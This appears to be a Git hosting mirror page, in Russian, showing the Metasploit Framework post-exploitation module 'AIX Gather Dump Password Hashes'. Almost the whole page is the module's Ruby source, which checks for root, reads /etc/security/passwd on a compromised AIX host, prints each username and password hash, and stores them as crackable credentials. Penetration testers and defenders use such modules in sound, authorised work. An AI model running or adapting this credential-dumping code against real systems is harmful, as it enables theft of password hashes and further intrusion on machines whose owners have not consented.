/
githubmirror
/
metasploit-framework
Обзор
Документация
Войти
/
githubmirror
/
metasploit-framework
Код
Запросы
0
Пакеты
0
Релизы
0
Аналитика
Безопасность
master
modules/post/aix/hashdump.rb
69 строк
2 KB
Christophe De La Fuente
Use sub-technique and add missing modules
16 сен 2025, 19:39
Не верифицирован
16 сен 2025, 19:39
788b9c2
Код
Авторство
О чём код?
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv def initialize(info = {}) super( update_info( info, 'Name' => 'AIX Gather Dump Password Hashes', 'Description' => %q{Post module to dump the password hashes for all users on an AIX system.}, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], 'Platform' => [ 'aix' ], 'SessionTypes' => [ 'shell' ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [], 'Reliability' => [] }, 'References' => [ [ 'ATT&CK', Mitre::Attack::Technique::T1003_008_ETC_PASSWD_AND_ETC_SHADOW ] ] ) ) end def run fail_with(Failure::NoAccess, 'You must run this module as root!') unless is_root? passwd_file = read_file('/etc/security/passwd') username = '' hash = '' passwd_file.each_line do |line| user_line = line.match(/(\w+):/) if user_line username = user_line[1] end hash_line = line.match(/password = (\w+)/) if hash_line hash = hash_line[1] end next unless hash.present? print_good("#{username}:#{hash}") credential_data = { jtr_format: 'des', origin_type: :session, post_reference_name: refname, private_type: :nonreplayable_hash, private_data: hash, session_id: session_db_id, username: username, workspace_id: myworkspace_id } create_credential(credential_data) username = '' hash = '' end end end